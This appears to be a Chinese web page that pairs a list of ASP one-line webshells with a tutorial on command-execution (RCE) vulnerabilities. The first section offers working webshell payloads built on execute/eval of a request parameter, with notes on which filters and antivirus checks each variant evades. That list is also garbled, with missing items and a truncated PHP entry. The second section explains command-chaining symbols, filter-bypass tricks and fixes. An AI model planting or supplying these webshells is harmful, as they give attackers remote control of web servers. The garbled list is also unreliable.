eval內容過濾繞過

⑴ 一句話木馬及幾種可繞過過濾格式

2. <%executerequest("YouPass")%> 襲3. <%execute(request("YouPass"))%>免殺大部分網站的一句話 4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>繞過部分網站過濾<%,%>的一句話 5.<script language=VBScript runat=server>execute request("YouPass")</script>繞過部分網站過濾雙引號的一句話 6.<%eval request(YouPass(35))%>php一句話 7.<?>

⑵ 滲透測試——命令執行漏洞（RCE）詳解

命令執行漏洞（RCE）是信息安全領域中一種重要的攻擊手段，它允許攻擊者通過執行不受控制的命令來影響系統或應用的行為。本文旨在深入解析命令執行漏洞的形成原因、利用條件及防範措施。

一、簡述命令執行漏洞

1. 形成原因：應用中經常需要調用能夠執行系統命令的函數，如 PHP 中的 system、exec、shell_exec 等。當開發者未能嚴格過濾用戶控制的參數時，惡意命令可通過拼接正常命令注入，進而導致命令執行攻擊。

2. 漏洞分類：

• 代碼層過濾不嚴：商業應用的核心代碼在調用系統命令時，如 PHP 的 system 函數，若參數過濾不嚴，可能導致攻擊。


• 系統漏洞：如 bash 的破殼漏洞（CVE-2014-6271）等，利用系統自身存在的安全漏洞執行命令。


• 第三方組件漏洞：調用存在代碼執行漏洞的第三方組件，如 WordPress 中的 imageMagick 組件、Java 的 Struts2 或 ElasticsearchGroovy 等。

二、利用條件

要利用命令執行漏洞，需滿足以下條件：

• 應用調用了能夠執行系統命令的函數。


• 函數參數可控，即用戶可影響參數內容。


• 開發者對參數過濾不嚴或過濾不充分。

繞過能力的評判取決於攻擊者的技術水平，繞過方式將在後續章節中介紹。

三、可能存在命令執行漏洞的函數（PHP）

1. 利用系統函數實現命令執行的函數：如 eval、assert、preg_replace、call_user_func 等，如果對用戶輸入未嚴格過濾，可能引發遠程命令執行。
2. 直接執行系統命令的代碼函數：system、exec、shell_exec、passthru 等，需注意參數安全。

四、命令拼接符號

命令執行漏洞的關鍵在於命令拼接，惡意命令通常拼接在正常命令後，掌握拼接符號是基礎。以下是常用符號及示例：

• &:使命令後台運行。如：command &，可以同時運行多個後台命令。


• ;:命令分隔符，實現無關聯的命令執行，每條命令互不影響。


• &&:左邊命令成功執行後執行右邊命令。


• ||:前面命令失敗時執行後面命令。


• ():組合多個命令，先執行括弧內的命令。

五、常見繞過防護的方法

1. 通配符：如使用通配符替代命令中的關鍵字元，可繞過部分安全限制。
2. 連接符：如使用引號、反斜杠等來規避安全檢查。
3. 未初始化變數：利用未初始化的變數值為 null，插入命令末尾，繞過黑名單檢測。

六、常見位置

命令執行漏洞最常出現在 CMS 框架、插件及應用的其他關鍵位置，這些地方往往需要執行系統命令。

七、修復方案

1. 升級框架、插件等至最新版本，打上安全補丁。
2. 關注行業動態，及時修復漏洞。
3. 減少框架/CMS 的使用。
4. 過濾危險符號，減少風險。
5. 安全配置 PHP 相關參數，禁用執行命令的函數。
6. 升級中間件。
7. 嚴格控制傳入變數，避免使用危險的魔法函數。

通過上述方法，開發者可有效防範命令執行漏洞，提升系統安全性。